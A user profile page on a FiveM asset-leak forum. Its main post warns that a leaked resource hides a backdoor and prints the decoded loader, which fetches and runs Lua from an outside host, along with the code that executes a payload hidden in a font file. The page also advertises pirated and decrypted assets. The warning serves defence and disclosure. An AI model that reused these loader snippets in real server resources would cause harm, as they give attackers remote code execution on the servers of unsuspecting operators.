Jump to content
Check out discord.gg/fxap for the cheapest decryptions! First one is free! ×

Get LB-Phone!

Unlock the powerful LB-Phone for a fraction of the price you pay on tebex.

Download

Premium TOS Clothing MEGA Pack!

11GB of pure TOS premium clothing best clothing pack for your Server!

Download

5Decrypt

Automated Asset Decryption

Learn More

coLdvL

Snail
  • Posts

    6
  • Joined

  • Last visited

About coLdvL

Recent Profile Visitors

865 profile views

coLdvL's Achievements

Master Leaker

Master Leaker (5/17)

  • Keeps Coming Back Rare

Recent Badges

0

Reputation

  1. ⚠️ WARNING: This resource contains a hidden backdoor This resource executes remote code and hidden payloads. It is not safe to run on a FiveM server. Proof Remote code execution via HTTP The following Base64 string decodes to: PerformHttpRequest('https://fivems.lt/bek', function(e, d) pcall(function() assert(load(d))() end) end) This downloads Lua code from the internet and executes it on the server without validation. Hidden payload inside a font file local data = LoadResourceFile(GetCurrentResourceName(), '/web/fonts/Helvetica.ttf') data = data.sub(data, 87565) data = data.gsub(data, '%.%+', '') data = data.gsub(data, '\\%.', '.') data = data.gsub(data, '\\', '') load(data)() This loads and executes Lua code hidden inside a .ttf file. This is a classic FiveM backdoor pattern (remote loader + hidden payload). I strongly recommend removing this resource from any production server.
  2. broken
  3. works for me
    maybe next time .
  4. nice work ❤️
×
×
  • Create New...

Important Information

By continuing on Launcherleaks.net, you agree to our Terms of Use, Guidelines & Privacy Policy